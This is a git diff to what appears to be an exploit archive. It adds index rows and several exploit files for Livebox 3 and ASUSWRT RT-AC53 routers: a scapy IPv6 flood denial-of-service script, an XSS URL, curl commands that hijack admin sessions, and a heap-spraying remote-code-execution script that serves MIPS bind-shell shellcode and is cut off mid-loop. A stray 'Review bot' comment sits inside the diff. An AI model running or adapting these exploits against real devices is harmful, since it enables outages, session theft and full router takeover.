diff --git a/files.csv b/files.csv
index 84517b257..4699d218c 100644
--- a/files.csv
+++ b/files.csv
@@ -5388,6 +5388,7 @@ id,file,description,date,author,platform,type,port
41475,platforms/windows/dos/41475.py,"Synchronet BBS 3.16c - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
41537,platforms/hardware/dos/41537.py,"Conext ComBox 865-1058 - Denial of Service",2017-03-02,"Mark Liapustin and Arik Kublanov",hardware,dos,0
41547,platforms/windows/dos/41547.py,"Evostream Media Server 1.7.1 (x64) - Denial of Service",2017-03-07,"Peter Baris",windows,dos,0
+41565,platforms/hardware/dos/41565.py,"Livebox 3 Sagemcom SG30_sip-fr-5.15.8.1 - Denial of Service",2017-03-09,"Quentin Olagne",hardware,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -14908,7 +14909,7 @@ id,file,description,date,author,platform,type,port
37600,platforms/multiple/remote/37600.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit) (2)",2015-07-13,Metasploit,multiple,remote,617
37611,platforms/windows/remote/37611.php,"Impero Education Pro - System Remote Command Execution",2015-07-14,slipstream,windows,remote,0
37628,platforms/hardware/remote/37628.rb,"D-Link - Cookie Command Execution (Metasploit)",2015-07-17,Metasploit,hardware,remote,0
-37647,platforms/multiple/remote/37647.txt,"Apache Struts2 - Skill Name Remote Code Execution",2012-08-23,kxlzx,multiple,remote,0
+37647,platforms/multiple/remote/37647.txt,"Apache Struts 2 - Skill Name Remote Code Execution",2012-08-23,kxlzx,multiple,remote,0
37655,platforms/windows/remote/37655.c,"Adobe Pixel Bender Toolkit2 - 'tbbmalloc.dll' Multiple DLL Loading Code Execution Vulnerabilities",2012-08-23,coolkaveh,windows,remote,0
37688,platforms/php/remote/37688.txt,"PHP 5.3.11/5.4.0RC2 - 'header()' HTTP Header Injection",2011-10-06,"Mr. Tokumaru",php,remote,0
37667,platforms/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' - Arbitrary File Upload (Metasploit)",2015-07-21,Metasploit,java,remote,0
@@ -15926,10 +15927,10 @@ id,file,description,date,author,platform,type,port
41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0
41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
-41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0
-41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,"Krzysztof Przybylski",lin_x86,shellcode,0
+41398,platforms/lin_x86-64/shellcode/41398.nasm,"Linux - TCP Reverse Shell Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",lin_x86-64,shellcode,0
+41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,lin_x86,shellcode,0
41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0
-41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,"Krzysztof Przybylski",win_x86,shellcode,0
+41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,lu0xheap,win_x86,shellcode,0
41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86-64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
41477,platforms/linux/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",linux,shellcode,0
41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
@@ -25294,7 +25295,7 @@ id,file,description,date,author,platform,type,port
19381,platforms/php/webapps/19381.php,"SugarCRM CE 6.3.1 - 'Unserialize()' PHP Code Execution",2012-06-23,EgiX,php,webapps,0
18322,platforms/php/webapps/18322.txt,"TinyWebGallery 1.8.3 - Remote Command Execution",2012-01-06,Expl0!Ts,php,webapps,0
18985,platforms/php/webapps/18985.txt,"pyrocms 2.1.1 - Multiple Vulnerabilities",2012-06-05,LiquidWorm,php,webapps,0
-18329,platforms/multiple/webapps/18329.txt,"Apache Struts2 < 2.3.1 - Multiple Vulnerabilities",2012-01-06,"SEC Consult",multiple,webapps,0
+18329,platforms/multiple/webapps/18329.txt,"Apache Struts 2 < 2.3.1 - Multiple Vulnerabilities",2012-01-06,"SEC Consult",multiple,webapps,0
18330,platforms/php/webapps/18330.txt,"WordPress Plugin pay with tweet 1.1 - Multiple Vulnerabilities",2012-01-06,"Gianluca Brindisi",php,webapps,0
18335,platforms/php/webapps/18335.txt,"MangosWeb - SQL Injection",2012-01-08,Hood3dRob1n,php,webapps,0
18338,platforms/php/webapps/18338.txt,"phpMyDirectory.com 1.3.3 - SQL Injection",2012-01-08,Serseri,php,webapps,0
@@ -37469,3 +37470,21 @@ id,file,description,date,author,platform,type,port
41552,platforms/php/webapps/41552.txt,"Videohive Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps,0
41553,platforms/php/webapps/41553.txt,"Envato Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps,0
41554,platforms/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",multiple,webapps,0
+41556,platforms/php/webapps/41556.txt,"Country on Sale Script - SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0
+41557,platforms/php/webapps/41557.txt,"Media Search Engine Script - 'search' Parameter SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0
+41558,platforms/php/webapps/41558.txt,"Soundify 1.1 - 'tid' Parameter SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0
+41559,platforms/php/webapps/41559.txt,"BistroStays 3.0 - 'guests' Parameter SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0
+41560,platforms/php/webapps/41560.txt,"Nlance 2.2 - SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0
+41561,platforms/php/webapps/41561.txt,"Busewe 1.2 - SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0
+41562,platforms/php/webapps/41562.txt,"Fashmark 1.2 - 'category' Parameter SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0
+41563,platforms/php/webapps/41563.txt,"TradeMart 1.1 - SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0
+41564,platforms/php/webapps/41564.php,"Drupal 7.x Module Services - Remote Code Execution",2017-03-09,"Charles Fol",php,webapps,0
+41566,platforms/php/webapps/41566.txt,"WordPress Plugin Mac Photo Gallery 3.0 - Arbitrary File Download",2017-03-09,"Ihsan Sencan",php,webapps,0
+41567,platforms/php/webapps/41567.txt,"WordPress Plugin Apptha Slider Gallery 1.0 - SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0
+41568,platforms/php/webapps/41568.txt,"WordPress Plugin Apptha Slider Gallery 1.0 - Arbitrary File Download",2017-03-09,"Ihsan Sencan",php,webapps,0
+41569,platforms/php/webapps/41569.txt,"WordPress Plugin PICA Photo Gallery 1.0 - SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0
+41570,platforms/linux/webapps/41570.py,"Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution",2017-03-07,"Vex Woo",linux,webapps,0
+41571,platforms/hardware/webapps/41571.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Cross-Site Scripting",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
+41572,platforms/hardware/webapps/41572.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
+41573,platforms/hardware/webapps/41573.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Remote Code Execution",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
+41574,platforms/xml/webapps/41574.html,"FTP Voyager Scheduler 16.2.0 - Cross-Site Request Forgery",2017-03-10,hyp3rlinx,xml,webapps,52986
diff --git a/platforms/hardware/dos/41565.py b/platforms/hardware/dos/41565.py
new file mode 100755
index 000000000..bea26bd58
--- /dev/null
+++ b/platforms/hardware/dos/41565.py
@@ -0,0 +1,50 @@
+#!/usr/bin/python
+
+# Exploit Title: CVE-2017-6552 - Local DoS Buffer Overflow Livebox 3
+# Date: 09/03/2017
+# Exploit Author: Quentin Olagne
+# Vendor Homepage: http://www.orange.fr/
+# Version: SG30_sip-fr-5.15.8.1
+# Tested on: Livebox 3 - Sagemcom
+# CVE : CVE-2017-6552
+
+'''
+Livebox router has its default IPv6 routing table max. size too
+small and therefore can be filled within minutes.
+An attacker can exploit this issue to render the affected system
+unresponsive, resulting in a denial-of-service condition for Phone,
+Internet and TV services.
+
+Vulenrability has been discovered in April '16 and has been patched some time ago with the newest firmware.
+I have submitted the idea to have a button to enable/disable IPv6 stack on the local interface from the admin
+livebox web UI, don't know if it's been implemented.
+
+'''
+
+from scapy.all import *
+import time
+import threading
+
+start_time = time.time()
+
+def printit():
+ threading.Timer(5.0, printit).start()
+ interval = time.time() - start_time
+ print 'Total time in seconds:', interval, '\n'
+
+printit()
+
+packet = Ether() \
+ /IPv6() \
+ /ICMPv6ND_RA() \
+ /ICMPv6NDOptPrefixInfo(prefix=RandIP6(),prefixlen=64) \
+ /ICMPv6NDOptSrcLLAddr(lladdr=RandMAC("00:01:42"))
+
+try:
+ sendp(packet,loop=1)
+except KeyboardInterrupt:
+ stored_exception=sys.exc_info()
+except:
+ pass
+
+print "Goodbye"
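Review bot: The recurring timer started inside `printit` is never cancelled, so after the `KeyboardInterrupt` branch the re-armed `threading.Timer` threads keep the interpreter alive and the script prints "Goodbye" but does not exit. Keep a handle and make it a daemon, `t = threading.Timer(5.0, printit)`, `t.daemon = True`, `t.start()`, or cancel it in the handler. `stored_exception = sys.exc_info()` is never read, and `sys` is only in scope if `from scapy.all import *` happens to re-export it; an explicit `import sys` next to `import time` would make that branch safe. The trailing bare `except: pass` also hides any send error, such as the interface not being up, which is the one thing the operator needs to see.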
diff --git a/platforms/hardware/webapps/41571.txt b/platforms/hardware/webapps/41571.txt
new file mode 100755
index 000000000..370c07f3d
--- /dev/null
+++ b/platforms/hardware/webapps/41571.txt
@@ -0,0 +1,22 @@
+Cross-Site Scripting (XSS)
+
+Component: httpd
+
+CVE: CVE-2017-6547
+
+Vulnerability:
+
+httpd checks in the function handle_request if the requested file name is longer than 50 chars. It then responds with a redirection which allows an attacker to inject arbitrary JavaScript code into the router’s web interface context.
+
+...
+
+if(strlen(file) > 50 &&!(strstr(file, "findasus")) && !(strstr(file, "acme-challenge")))
+{
+ char inviteCode[256];
+ snprintf(inviteCode, sizeof(inviteCode), "", file);
+ send_page( 200, "OK", (char*) 0, inviteCode, 0);
+
+...
+PoC:
+
+http://192.168.1.1/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';alert('XSS');'A
diff --git a/platforms/hardware/webapps/41572.txt b/platforms/hardware/webapps/41572.txt
new file mode 100755
index 000000000..8fb6ef734
--- /dev/null
+++ b/platforms/hardware/webapps/41572.txt
@@ -0,0 +1,56 @@
+Session Stealing
+
+Component: httpd
+
+CVE: CVE-2017-6549
+
+Vulnerability:
+
+httpd uses the function search_token_in_list to validate if a user is logged into the admin interface by checking his asus_token value. There seems to be a branch which could be a failed attempt to build in a logout functionality.
+
+asus_token_t* search_token_in_list(char* token, asus_token_t **prev)
+{
+ asus_token_t *ptr = head;
+ asus_token_t *tmp = NULL;
+ int found = 0;
+ char *cp = NULL;
+
+ while(ptr != NULL)
+ {
+ if(!strncmp(token, ptr->token, 32)) {
+ found = 1;
+ break;
+ }
+ else if(strncmp(token, "cgi_logout", 10) == 0) {
+ cp = strtok(ptr->useragent, "-");
+
+ if(strcmp(cp, "asusrouter") != 0) {
+ found = 1;
+ break;
+ }
+ }
+ else {
+ tmp = ptr;
+ ptr = ptr->next;
+ }
+ }
+
+ if(found == 1) {
+ if(prev)
+ *prev = tmp;
+ return ptr;
+ }
+ else {
+ return NULL;
+ }
+}
+If an attacker sets his cookie value to cgi_logout and puts asusrouter-Windows-IFTTT-1.0 into his User-Agent header he will be treated as signed-in if any other administrator session is active.
+
+PoC:
+
+# read syslog
+curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' http://192.168.1.1/syslog.txt
+
+#reboot router
+curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' http://192.168.1.1/apply.cgi1 -d 'action_mode=reboot&action_script=&action_wait=70'
+It’s possible to execute arbitrary commands on the router if any admin session is currently active.
\ No newline at end of file
diff --git a/platforms/hardware/webapps/41573.txt b/platforms/hardware/webapps/41573.txt
new file mode 100755
index 000000000..5f58b9b5a
--- /dev/null
+++ b/platforms/hardware/webapps/41573.txt
@@ -0,0 +1,440 @@
+Remote Code Execution
+
+Component: networkmap
+
+CVE: CVE-2017-6548
+
+networkmap is responsible for generating a map of computers connected to the router. It continuously monitors the LAN to detect ARP requests submitted by unknown computers. When a new MAC address appears it will probe the related IP address for running services like printer sharing, http server and also iTunes servers.
+
+This is implemented by sending out multicast SSP discoveries:
+
+M-SEARCH * HTTP/1.1
+HOST: 239.255.255.250:1900
+ST:upnp:rootdevice
+MAN:"ssdp:discover"
+MX:3
+A device can then respond with messages which indicate the location of the iTunes service.
+
+HTTP/1.1 200 OK
+Location:HTTP://host:port/path
+Vulnerability:
+
+The function process_device_repsonse is responsible for parsing the SSDP answer:
+
+
+/************************************************************************************************/
+// process the device response "HTTP/1.1 200 OK"
+int process_device_response(char *msg)
+{
+ char *line, *body, *p; // temporary variables
+ char *location = NULL; // the LOCATION: header
+ char host[16], port[6]; // the ip and port of the device
+ ushort destport; // the integer type of device port
+ char *data = NULL; // the data in packet
+ int http_fd; // the http socket fd
+ int nbytes; // recv number
+ int i;
+ char *descri = NULL;
+ int len;
+ struct timeval timeout={10, 0};
+
+ //search "\r\n\r\n" or "\r\n" first appear place and judge whether msg have blank.
+ if( (body = strstr(msg, "\r\n\r\n")) != NULL)
+ body +=4;
+ else if ( (body = strstr(msg, "\r\n")) != NULL)
+ body +=2;
+ else
+ return 0;
+
+ p = msg;
+ // find the LOCATION information.
+ while( p!= NULL && p < body)
+ {
+ line = strsep(&p, "\r\n"); //divide up string
+ if((strncmp(line, "LOCATION:", 9) == 0) || (strncmp(line, "Location:", 9) == 0))
+ {
+ location = strip_chars(&line[9], "\t");
+ location = strip_chars(&line[9], " ");
+ break;
+ }
+ }
+ NMP_DEBUG_F("UPnP location=%s\n", location);
+ //fprintf(fp_upnp, "UPnP location=%s\n", location);//Yau
+ // get the destination ip
+ location += 7;
+ i = 0;
+ while( (*location != ':') && (*location != '/')) {
+ host[i] = *location++;
+ i++;
+ }
+ host[i] = '\0';
+ //get the destination port
+ if(*location == ':') {
+ for(location++, i =0; *location != '/'; i++)
+ port[i] = *location++;
+ port[i] = '\0';
+ destport = (ushort)atoi(port);
+ }
+ else
+ destport = 80;
+It contains multiple buffer overflows in the parsing code for host and port. This stack-based overflow can be used to gain control over networkmap’s control flow by overwriting the saved $pc stored on the stack.
+
+Parsing this message:
+
+HTTP/1.1 200 OK
+Location:HTTP://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/
+will overflow host[16] and lead to $pc being set to 0x41414141 which is a starting point for further exploitation.
+
+Exploitation:
+
+In order to develop a working exploit we gather further information of the system.
+
+General Information:
+
+ASUSWRT is based on Linux which is running on a little endian MIPS CPU. The vulnerable program networkmap gets automatically started when the device boots and additionally gets restarted by the watchdog process if it crashes.
+
+# cat /proc/cpuinfo
+system type : MT7620
+processor : 0
+cpu model : MIPS 24Kc V5.0
+BogoMIPS : 386.04
+wait instruction : yes
+microsecond timers : yes
+tlb_entries : 32
+extra interrupt vector : yes
+hardware watchpoint : yes, count: 4, address/irw mask: [0x0000, 0x0ff8, 0x0ff8, 0x0ff8]
+ASEs implemented : mips16 dsp
+shadow register sets : 1
+core : 0
+VCED exceptions : not available
+VCEI exceptions : not available
+
+# ps
+ PID USER VSZ STAT COMMAND
+ 1 admin 3940 S /sbin/init
+ 2 admin 0 SW [kthreadd]
+ 3 admin 0 SW [ksoftirqd/0]
+ 4 admin 0 SW [kworker/0:0]
+ 5 admin 0 SW [kworker/u:0]
+ 6 admin 0 SW< [khelper]
+ 7 admin 0 SW [sync_supers]
+ 8 admin 0 SW [bdi-default]
+ 9 admin 0 SW< [kintegrityd]
+ 10 admin 0 SW< [kblockd]
+ 11 admin 0 SW [kswapd0]
+ 12 admin 0 SW [fsnotify_mark]
+ 13 admin 0 SW< [crypto]
+ 17 admin 0 SW [mtdblock0]
+ 18 admin 0 SW [mtdblock1]
+ 19 admin 0 SW [mtdblock2]
+ 20 admin 0 SW [mtdblock3]
+ 21 admin 0 SW [mtdblock4]
+ 22 admin 0 SW [mtdblock5]
+ 23 admin 0 SW [kworker/u:1]
+ 30 admin 0 SW [kworker/0:1]
+ 41 admin 660 S hotplug2 --persistent --no-coldplug
+ 76 admin 3924 S console
+ 78 admin 1276 S /sbin/syslogd -m 0 -S -O /tmp/syslog.log -s 256 -l 6
+ 80 admin 1276 S /sbin/klogd -c 5
+ 82 admin 1292 S /bin/sh
+ 115 admin 0 SW [RtmpCmdQTask]
+ 116 admin 0 SW [RtmpWscTask]
+ 135 admin 0 SW [RtmpCmdQTask]
+ 136 admin 0 SW [RtmpWscTask]
+ 164 admin 3932 S /sbin/wanduck
+ 168 admin 1128 S dropbear -p 192.168.1.1:22 -a
+ 175 admin 3932 S wpsaide
+ 189 nobody 1056 S dnsmasq --log-async
+ 194 admin 2588 S avahi-daemon: running [RT-AC53-B8F4.local]
+ 196 admin 4112 S httpd -i br0
+ 197 admin 1068 S /usr/sbin/infosvr br0
+ 199 admin 3932 S watchdog
+ 201 admin 2180 S rstats
+ 210 admin 1160 S lld2d br0
+ 211 admin 3932 S ots
+ 224 admin 800 S miniupnpd -f /etc/upnp/config
+ 229 admin 1284 S /sbin/udhcpc -i vlan2 -p /var/run/udhcpc0.pid -s /tmp/udhcpc -O33 -O249
+ 302 admin 1152 S dropbear -p 192.168.1.1:22 -a
+ 303 admin 1300 S -sh
+ 344 admin 1128 S networkmap
+ 359 admin 1280 R ps
+
+# uname -a
+Linux (none) 2.6.36 #1 Fri Sep 23 12:05:55 CST 2016 mips GNU/Linux
+Memory Map:
+
+networkmap’s memory map is analyzed to continue exploiting the device.
+
+# cat /proc/$(pidof networkmap)/maps
+00400000-0040b000 r-xp 00000000 1f:04 270 /usr/sbin/networkmap
+0041a000-0041b000 rw-p 0000a000 1f:04 270 /usr/sbin/networkmap
+0041b000-0041f000 rwxp 00000000 00:00 0 [heap]
+2b893000-2b894000 rw-p 00000000 00:00 0
+2b894000-2b89a000 r-xp 00000000 1f:04 828 /lib/ld-uClibc.so.0
+2b89a000-2b8a0000 rw-s 00000000 00:04 0 /SYSV000003e9 (deleted)
+2b8a0000-2b8a4000 rw-s 00000000 00:04 32769 /SYSV000003ea (deleted)
+2b8a9000-2b8aa000 r--p 00005000 1f:04 828 /lib/ld-uClibc.so.0
+2b8aa000-2b8ab000 rw-p 00006000 1f:04 828 /lib/ld-uClibc.so.0
+2b8ab000-2b8d9000 r-xp 00000000 1f:04 258 /usr/lib/libshared.so
+2b8d9000-2b8e8000 ---p 00000000 00:00 0
+2b8e8000-2b8eb000 rw-p 0002d000 1f:04 258 /usr/lib/libshared.so
+2b8eb000-2b8ed000 rw-p 00000000 00:00 0
+2b8ed000-2b8ef000 r-xp 00000000 1f:04 235 /usr/lib/libnvram.so
+2b8ef000-2b8ff000 ---p 00000000 00:00 0
+2b8ff000-2b900000 rw-p 00002000 1f:04 235 /usr/lib/libnvram.so
+2b900000-2b90e000 r-xp 00000000 1f:04 760 /lib/libgcc_s.so.1
+2b90e000-2b91e000 ---p 00000000 00:00 0
+2b91e000-2b91f000 rw-p 0000e000 1f:04 760 /lib/libgcc_s.so.1
+2b91f000-2b95a000 r-xp 00000000 1f:04 827 /lib/libc.so.0
+2b95a000-2b96a000 ---p 00000000 00:00 0
+2b96a000-2b96b000 rw-p 0003b000 1f:04 827 /lib/libc.so.0
+2b96b000-2b96f000 rw-p 00000000 00:00 0
+2b970000-2b97f000 r--s 03eb0000 00:0c 78 /dev/nvram
+7f8a7000-7f8c8000 rwxp 00000000 00:00 0 [stack]
+7fff7000-7fff8000 r-xp 00000000 00:00 0 [vdso]
+Observations:
+
+Partial ASLR is activated:
+
+Stack address is randomized
+Library addresses are randomized
+Program address is not randomized
+Heap address is not randomized
+There is no Stack-Protector
+
+Both heap and stack are mapped executable
+
+The binary contains almost no gadgets suitable for building a ROP chain
+
+Exploit:
+
+The final exploit consists of the following steps:
+
+Starting a webserver serving shellcode
+Listening for multicast UDP messages send by the router
+Database clearing / crashing: to make the heap layout predictable
+Randomizing MAC address
+Send message: jump to gadget that deletes networkmap’s database and crashes
+networkmap will be restarted
+Spraying heap 1, 2:
+Randomizing MAC address
+Send message: containing the webserver’s IP+port
+networkmap will receive shellcode and store it on the heap
+Starting payload
+Randomize MAC address
+Send message: jump to heap address containing the shellcode
+Connect to opened shell
+For further details check out the full exploit: networkmap-pwn.py (https://bierbaumer.net/networkmap-pwn.py)
+
+Example:
+
+# ./networkmap-pwn.py
+[-] starting webserver
+[-] received SSP discovery
+[-] clearing database and crashing
+[-] received SSP discovery
+[-] spraying heap 1/2
+[-] got shellcode request
+[-] sending shellcode
+[-] received SSP discovery
+[-] spraying heap 2/2
+[-] received SSP discovery
+[-] starting payload
+[-] try to connect to shell
+[-] try to connect to shell
+[+] connected
+Linux (none) 2.6.36 #1 Fri Sep 23 12:05:55 CST 2016 mips GNU/Linux
+[+] pwned
+
+
+
+
+---networkmap-pwn.py---
+#!/usr/bin/env python3
+# ASUSWRT networkmap Remote Code Execution
+# Author: Bruno Bierbaumer
+# Date: 24/02/2017
+# Tested version:
+# RT-AC53 (3.0.0.4.380.6038)
+# CVE: TODO
+
+# Description:
+# networkmap contains a stack-based buffer overflow which can be exploited to run arbitrary code.
+
+
+ROUTER_IP = '192.168.1.1'
+IP = '192.168.1.2'
+INTERACE = 'enp0s31f6'
+
+"""
+ Shellcode adjusted from https://www.exploit-db.com/exploits/13298/
+"""
+
+sc = b"\x41\x41\x04\x28" *1400 # nops
+#alarm handling
+sc += b"\xff\xff\x04\x28" # a0 <- 0 */
+sc += b"\xbb\x0f\x02\x24" # li v0,4027 ( __alarm ) */
+sc += b"\x0c\x01\x01\x01" # syscall
+sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
+#/alarm
+sc += b"\xe0\xff\xbd\x27" # addiu sp,sp,-32 */
+sc += b"\xfd\xff\x0e\x24" # li t6,-3 */
+sc += b"\x27\x20\xc0\x01" # nor a0,t6,zero */
+sc += b"\x27\x28\xc0\x01" # nor a1,t6,zero */
+sc += b"\xff\xff\x06\x28" # slti a2,zero,-1 */
+sc += b"\x57\x10\x02\x24" # li v0,4183 ( __NR_socket ) */
+sc += b"\x0c\x01\x01\x01" # syscall */
+sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
+sc += b"\xff\xff\x50\x30" # andi s0,v0,0xffff */
+sc += b"\xef\xff\x0e\x24" # li t6,-17 */
+sc += b"\x27\x70\xc0\x01" # nor t6,t6,zero */
+sc += b"\x13\x37\x0d\x24" # li t5,0x3713 (port 0x1337) */
+sc += b"\x04\x68\xcd\x01" # sllv t5,t5,t6 */
+sc += b"\xff\xfd\x0e\x24" # li t6,-513 */
+sc += b"\x27\x70\xc0\x01" # nor t6,t6,zero */
+sc += b"\x25\x68\xae\x01" # or t5,t5,t6 */
+sc += b"\xe0\xff\xad\xaf" # sw t5,-32(sp) */
+sc += b"\xe4\xff\xa0\xaf" # sw zero,-28(sp) */
+sc += b"\xe8\xff\xa0\xaf" # sw zero,-24(sp) */
+sc += b"\xec\xff\xa0\xaf" # sw zero,-20(sp) */
+sc += b"\x25\x20\x10\x02" # or a0,s0,s0 */
+sc += b"\xef\xff\x0e\x24" # li t6,-17 */
+sc += b"\x27\x30\xc0\x01" # nor a2,t6,zero */
+sc += b"\xe0\xff\xa5\x23" # addi a1,sp,-32 */
+sc += b"\x49\x10\x02\x24" # li v0,4169 ( __NR_bind ) */
+sc += b"\x0c\x01\x01\x01" # syscall */
+sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
+sc += b"\x25\x20\x10\x02" # or a0,s0,s0 */
+sc += b"\x01\x01\x05\x24" # li a1,257 */
+sc += b"\x4e\x10\x02\x24" # li v0,4174 ( __NR_listen ) */
+sc += b"\x0c\x01\x01\x01" # syscall */
+sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
+sc += b"\x25\x20\x10\x02" # or a0,s0,s0 */
+sc += b"\xff\xff\x05\x28" # slti a1,zero,-1 */
+sc += b"\xff\xff\x06\x28" # slti a2,zero,-1 */
+sc += b"\x48\x10\x02\x24" # li v0,4168 ( __NR_accept ) */
+sc += b"\x0c\x01\x01\x01" # syscall */
+sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
+sc += b"\xff\xff\x50\x30" # andi s0,v0,0xffff */
+sc += b"\x25\x20\x10\x02" # or a0,s0,s0 */
+sc += b"\xfd\xff\x0f\x24" # li t7,-3 */
+sc += b"\x27\x28\xe0\x01" # nor a1,t7,zero */
+sc += b"\xdf\x0f\x02\x24" # li v0,4063 ( __NR_dup2 ) */
+sc += b"\x0c\x01\x01\x01" # syscall */
+sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
+sc += b"\x25\x20\x10\x02" # or a0,s0,s0 */
+sc += b"\x01\x01\x05\x28" # slti a1,zero,0x0101 */
+sc += b"\xdf\x0f\x02\x24" # li v0,4063 ( __NR_dup2 ) */
+sc += b"\x0c\x01\x01\x01" # syscall */
+sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
+sc += b"\x25\x20\x10\x02" # or a0,s0,s0 */
+sc += b"\xff\xff\x05\x28" # slti a1,zero,-1 */
+sc += b"\xdf\x0f\x02\x24" # li v0,4063 ( __NR_dup2 ) */
+sc += b"\x0c\x01\x01\x01" # syscall */
+sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
+sc += b"\x50\x73\x06\x24" # li a2,0x7350 */
+sc += b"\xff\xff\xd0\x04" # LB: bltzal a2,LB */
+sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
+sc += b"\xff\xff\x06\x28" # slti a2,zero,-1 */
+sc += b"\xdb\xff\x0f\x24" # li t7,-37 */
+sc += b"\x27\x78\xe0\x01" # nor t7,t7,zero */
+sc += b"\x21\x20\xef\x03" # addu a0,ra,t7 */
+sc += b"\xf0\xff\xa4\xaf" # sw a0,-16(sp) */
+sc += b"\xf4\xff\xa0\xaf" # sw zero,-12(sp) */
+sc += b"\xf0\xff\xa5\x23" # addi a1,sp,-16 */
+sc += b"\xab\x0f\x02\x24" # li v0,4011 ( __NR_execve ) */
+sc += b"\x0c\x01\x01\x01" # syscall */
+sc += b"/bin/sh";
+
+
+import time
+import struct
+import socket
+import sys
+import os
+import threading
+import socketserver
+import telnetlib
+
+# randomize mac address
+def mac():
+ os.system('macchanger -A {} > /dev/null'.format(INTERACE))
+
+# setup interface
+os.system('ifconfig {} down; ifconfig {} {} up; route add default gw {}'.format(INTERACE, INTERACE, IP, ROUTER_IP))
+
+
+# setup minimal webserver for delivering the shellcode
+class ThreadedHTTPRequestHandler(socketserver.BaseRequestHandler):
+
+ def handle(self):
+ print('[-] got shellcode request')
+ self.request.recv(1024)
+ print("[-] sending shellcode")
+ self.request.send(sc)
+
+class ThreadedHTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
+ pass
+
+print('[-] starting webserver')
+socketserver.TCPServer.allow_reuse_address = True
+server = ThreadedHTTPServer(('0.0.0.0', 1337), ThreadedHTTPRequestHandler)
+t = threading.Thread(target=server.serve_forever)
+t.start()
+
+# start multicast receiver
+addrinfo = socket.getaddrinfo('239.255.255.250', None)[0]
+s = socket.socket(addrinfo[0], socket.SOCK_DGRAM)
+s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+s.bind(('', 1900))
+group_bin = socket.inet_pton(addrinfo[0], addrinfo[4][0])
+mreq = group_bin + struct.pack('=I', socket.INADDR_ANY)
+s.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
+
+mac()
+state = 'clean'
+
+while True:
